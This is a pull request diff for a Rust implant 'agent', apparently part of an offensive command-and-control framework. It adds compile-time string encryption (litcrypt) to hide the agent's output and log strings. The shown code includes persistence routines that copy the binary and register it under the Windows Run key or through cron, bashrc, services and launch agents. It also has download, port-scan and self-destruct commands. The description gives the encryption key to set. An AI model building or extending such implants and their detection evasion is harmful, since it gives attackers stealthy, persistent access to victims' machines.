### PR TITLE
Litcrypt!

### DIFF
--- a/agent/Cargo.lock
+++ b/agent/Cargo.lock
@@ -452,6 +452,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "eef78b64d87775463c549fbd80e19249ef436ea3bf1de2a1eb7e717ec7fab1e9"
 
 [[package]]
+name = "litcrypt"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5f82f92066d9d41b3a569b459b7874e67feb835507a83b7bd142ea9f56c620c7"
+dependencies = [
+ "proc-macro2",
+ "quote",
+]
+
+[[package]]
 name = "lock_api"
 version = "0.4.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -596,6 +606,7 @@ dependencies = [
  "is-root",
  "kernel32-sys",
  "libc",
+ "litcrypt",
  "rand",
  "reqwest",
  "serde",

--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -29,7 +29,6 @@ winapi = { version = "0.3.8", features = ["winnt","winuser", "handleapi", "proce
 winreg = "0.10"
 houdini = "1.0.2"
 
-
 [profile.dev]
 opt-level = 0
 

--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -19,6 +19,7 @@ rand = "0.8.0"
 is-root = "0.1.2"
 base64 = "0.13.0"
 cidr-utils = "0.5.5"
+litcrypt = "0.3"
 
 [build-dependencies]
 embed-resource = "1.6"

--- a/agent/src/cmd/cd.rs
+++ b/agent/src/cmd/cd.rs
@@ -10,7 +10,7 @@ pub fn handle(cmd_args: &mut CommandArgs) -> Result<String, Box<dyn Error>> {
     let new_path = Path::new(&path_arg);
     match set_current_dir(new_path) {
         Ok(_) => notion_out!("Changed to {path_arg}"),
-        Err(e) => notion_out!("{e}")
+        Err(e) => Ok(format!("{e}"))
     }
 }
 

--- a/agent/src/cmd/download.rs
+++ b/agent/src/cmd/download.rs
@@ -3,7 +3,7 @@ use std::io::copy;
 use reqwest::Client;
 use std::fs::File;
 use crate::cmd::{CommandArgs, notion_out};
-use crate::logger::Logger;
+use crate::logger::{Logger, log_out};
 
 /// Downloads a file to the local system.
 /// 
@@ -21,7 +21,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
     if r.status().is_success() {
         if let Ok(mut out_file) = File::create(&path) {
             match copy(&mut r.bytes().await?.as_ref(), &mut out_file) {
-                Ok(b)  => { return notion_out!("{b} bytes written to {path}");},
+                Ok(b)  => { return Ok(format!("{b} bytes written to {path}"));},
                 Err(_) => { return notion_out!("Could not write file"); }
             }
         } else {

--- a/agent/src/cmd/getprivs.rs
+++ b/agent/src/cmd/getprivs.rs
@@ -54,6 +54,6 @@ pub async fn handle() -> Result<String, Box<dyn Error>> {
     // TODO: Implement Linux check
     let is_admin = is_elevated();  
     println!("{}", is_admin);
-    notion_out!("Admin Context: {is_admin}")
+    Ok(format!("Admin Context: {is_admin}"))
     
 }

--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -26,9 +26,10 @@ mod whoami;
 mod unknown;
 mod selfdestruct;
 
+
 macro_rules! notion_out {
     ($s:literal) => {
-        Ok(format!($s).to_string())
+        Ok(lc!(format!($s).to_string()))
     };
 }
 pub(crate) use notion_out;

--- a/agent/src/cmd/persist.rs
+++ b/agent/src/cmd/persist.rs
@@ -10,7 +10,7 @@ use crate::cmd::{CommandArgs, shell, save, notion_out};
 #[cfg(windows)] use std::process::Command;
 #[cfg(windows)] use crate::cmd::getprivs::is_elevated;
 use crate::config::ConfigOptions;
-use crate::logger::Logger;
+use crate::logger::{Logger, log_out};
 
 
 /// Uses the specified method to establish persistence. 
@@ -50,15 +50,15 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                     let mut persist_path: String = v;
                     persist_path.push_str(r"\notion.exe");
                     let exe_path = args().nth(0).unwrap();
-                    logger.debug(format!("Current exec path: {exe_path}"));
+                    logger.debug(log_out!("Current exec path: {exe_path}"));
                     // let mut out_file = File::create(path).expect("Failed to create file");
                     fs_copy(&exe_path, &persist_path)?;
                     let hkcu = RegKey::predef(HKEY_CURRENT_USER);
                     let path = Path::new(r"Software\Microsoft\Windows\CurrentVersion\Run");
                     let (key, disp) = hkcu.create_subkey(&path)?;
                     match disp {
-                        REG_CREATED_NEW_KEY => logger.info("A new key has been created".to_string()),
-                        REG_OPENED_EXISTING_KEY => logger.info("An existing key has been opened".to_string()),
+                        REG_CREATED_NEW_KEY => logger.info(log_out!("A new key has been created")),
+                        REG_OPENED_EXISTING_KEY => logger.info(log_out!("An existing key has been opened")),
                     };
                     key.set_value("Notion", &persist_path)?;
                     notion_out!("Persistence accomplished")
@@ -188,7 +188,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
             "cron"    => {
                 // Copy the app to a new folder
                 match create_dir(&app_dir) {
-                    Ok(_) => { logger.info("Notion directory created".to_string()); },
+                    Ok(_) => { logger.info(log_out!("Notion directory created")); },
                     Err(e) => { logger.err(e.to_string()); }
                 };
                 if let Ok(_) = copy(&app_path, dest_path) {
@@ -212,7 +212,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
             "bashrc"  => {
                 // Copy the app to a new folder
                 match create_dir(&app_dir) {
-                    Ok(_) => { logger.info("Notion directory created".to_string()); },
+                    Ok(_) => { logger.info(log_out!("Notion directory created")); },
                     Err(e) => { logger.err(e.to_string()); }
                 };
                 if let Ok(_) = copy(&app_path, dest_path) {
@@ -234,7 +234,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
             "service" => {
                 if is_root() {
                     match create_dir(&app_dir) {
-                        Ok(_) => { logger.info("Notion directory created".to_string()); },
+                        Ok(_) => { logger.info(format!("Notion directory created")); },
                         Err(e) => { logger.err(e.to_string()); }
                     };    
                     if let Ok(_) = copy(&app_path, &dest_path) {
@@ -282,8 +282,8 @@ WantedBy=multi-user.target"
             "loginitem" => {
                 // Copy the app to a new folder
                 match create_dir(&app_dir) {
-                    Ok(_) => { logger.info("Notion directory created".to_string()); },
-                    Err(e) => { logger.err(e.to_string()); }
+                    Ok(_) => { logger.info(log_out!("Notion directory created")); },
+                    Err(e) => { logger.err(log_out!(e.to_string())); }
                 };
                 if let Ok(_) = copy(&app_path, &dest_path) {
                     // Save config for relaunch
@@ -307,8 +307,8 @@ WantedBy=multi-user.target"
             "launchagent" => {
                 
                 match create_dir(&app_dir) {
-                    Ok(_) => { logger.info("Notion directory created".to_string()); },
-                    Err(e) => { logger.err(e.to_string()); }
+                    Ok(_) => { logger.info(log_out!("Notion directory created").to_string()); },
+                    Err(e) => { logger.err(log_out!(e.to_string())); }
                 };    
                 if let Ok(_) = copy(&app_path, &dest_path) {
                     let b64_config = config_options.to_base64();

--- a/agent/src/cmd/portscan.rs
+++ b/agent/src/cmd/portscan.rs
@@ -6,7 +6,7 @@ use std::{
 use cidr_utils::cidr::IpCidr;
 use tokio::net::TcpStream;
 use tokio::sync::mpsc::channel;
-use crate::logger::Logger;
+use crate::logger::{Logger};
 use crate::cmd::{CommandArgs, notion_out};
 
 

--- a/agent/src/cmd/pwd.rs
+++ b/agent/src/cmd/pwd.rs
@@ -1,11 +1,10 @@
 use std::error::Error;
 use std::env::current_dir;
-use crate::cmd::notion_out;
 
 /// Prints working directory.
 pub async fn handle() -> Result<String, Box<dyn Error>> {
     match current_dir() {
         Ok(b) => Ok(String::from(b.to_str().unwrap())),
-        Err(e) => notion_out!("{e}")
+        Err(e) => Ok(e.to_string())
     }
 }

--- a/agent/src/cmd/runas.rs
+++ b/agent/src/cmd/runas.rs
@@ -1,15 +1,15 @@
 use std::error::Error;
-use crate::cmd::CommandArgs;
+use crate::cmd::{CommandArgs, notion_out};
 
 /// Runs given command as another user. Requires admin privs.
 /// 
 /// Usage: `runas [user] [command]`
-pub async fn handle(cmd_args: &CommandArgs) -> Result<String, Box<dyn Error>> {
+pub async fn handle(_cmd_args: &CommandArgs) -> Result<String, Box<dyn Error>> {
     // TODO: Implement
     #[cfg(windows)] {
-        return Ok(String::from("Under Construction!"))
+        return notion_out!("Under Construction!");
     }
     #[cfg(not(windows))] {
-        return Ok(String::from("Runas only works on Windows!"))
+        return notion_out!("Runas only works on Windows!");
     }
 }

--- a/agent/src/cmd/save.rs
+++ b/agent/src/cmd/save.rs
@@ -13,6 +13,6 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
     // let write_path = RelativePath::new(config_options.config_file_path.as_str());
     match write(&config_options.config_file_path, json_to_string(config_options)?) {
         Ok(_) => notion_out!("Config file saved to {save_path}"),
-        Err(e) => notion_out!("{e}")
+        Err(e) => Ok(format!("{e}"))
     }
 }

--- a/agent/src/logger.rs
+++ b/agent/src/logger.rs
@@ -70,3 +70,10 @@ impl Logger {
     } 
 
 }
+
+macro_rules! log_out {
+    ($s:literal) => {
+        lc!(format!($s).to_string())
+    };
+}
+pub(crate) use log_out;

--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -4,6 +4,8 @@ extern crate tokio;
 extern crate serde_json;
 extern crate whoami;
 extern crate base64;
+#[macro_use]
+extern crate litcrypt;
 
 use std::{thread, time};
 use std::env::args;
@@ -31,6 +33,8 @@ mod cmd;
 use cmd::{NotionCommand, CommandType};
 mod logger;
 
+// Used to encrypt strings
+use_litcrypt!();
 
 #[tokio::main]
 async fn main() -> Result<(), Box<dyn std::error::Error>> {


### PR DESCRIPTION
This one takes a little explanation.

Every string literal that uses `notion_out!` or the logger is now encrypted using litcrypt. But here's the deal: in order for this to work, the environment variable `LITCRYPT_ENCRYPT_KEY` must be set. Then, in the same shell session, VSCode can be launched.

The result is all (or most) of our 

So:

```bash
export LITCRYPT_ENCRYPT_KEY="offensivenotionrules!"
code .
```

Without doing this, VSCode will still work, but it'll yell at ya about that macro.

For compilation in the build script or anywhere else, this will also have to be set. I'll let you decide exactly where that should occur, @HuskyHacks.